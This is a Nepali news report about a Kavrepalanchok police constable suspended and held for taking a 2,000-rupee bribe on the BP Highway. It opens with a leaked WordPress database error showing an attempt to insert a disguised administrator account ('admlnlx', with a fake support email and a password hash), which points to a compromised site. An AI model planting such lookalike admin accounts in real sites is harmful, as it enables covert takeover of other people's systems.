WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD5wOTyhmv.STjc3TZtgFTYiwc06iB.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:11:46', '', 'admlnlx', 'admlnlx')
बनेपा, पुस १२–
काभ्रेपलाञ्चोकमा एक प्रहरी जवान निलम्बनमा परेका छन् । केही दिनअघि काममा खटिएका बेला एक प्रहरीले बिपी राजमार्ग हुँदै चल्ने टाटासुमोसँग दुई हजार रुपैयाँ घुस खाएको आरोपमा उनलाई निलम्बन गरिएको जिल्ला प्रहरी कार्यालय, काभ्रेपलाञ्चोकले जनाएको छ ।
प्रत्यक्षदर्शीका अनुसार घुस नदिएका कारण ती प्रहरी जवानले सुमोलाई अघि बढ्न नदिएपछि रु दुई हजार घुस दिएका थिए । तर पुनः फर्केर सुमोका चालकले आफूले दिएको दुई हजार रुपैयाँ फिर्ता मागेपछि किन दिने ? भनेर जवाफ फर्काएपछि प्रहरी उपरीक्षक सहकुल थापाले उनलाई पक्राउ गर्न निर्देशन दिनुभएको थियो ।
सो घटनामा काभ्रेभञ्ज्याङ प्रहरी चौकीमा कार्यरत ऋषिदेव कुशहवालाई प्रहरीले पक्राउ गरी हिरासतमा लिएको छ । रामेछापको मन्थली जान हिँडेको सो सुमोमा जिल्ला प्रहरी कार्यालय, काभ्रेपलाञ्चोकका प्रहरी उपरीक्षक सहकुल थापा अनुगमनका लागि सवार हुनुहुन्थ्यो । प्रहरी उपरीक्षक थापाले सो घटना भएको स्वीकार गर्दैै विभागीय कारबाही हुने बताउनुभयो । –रासस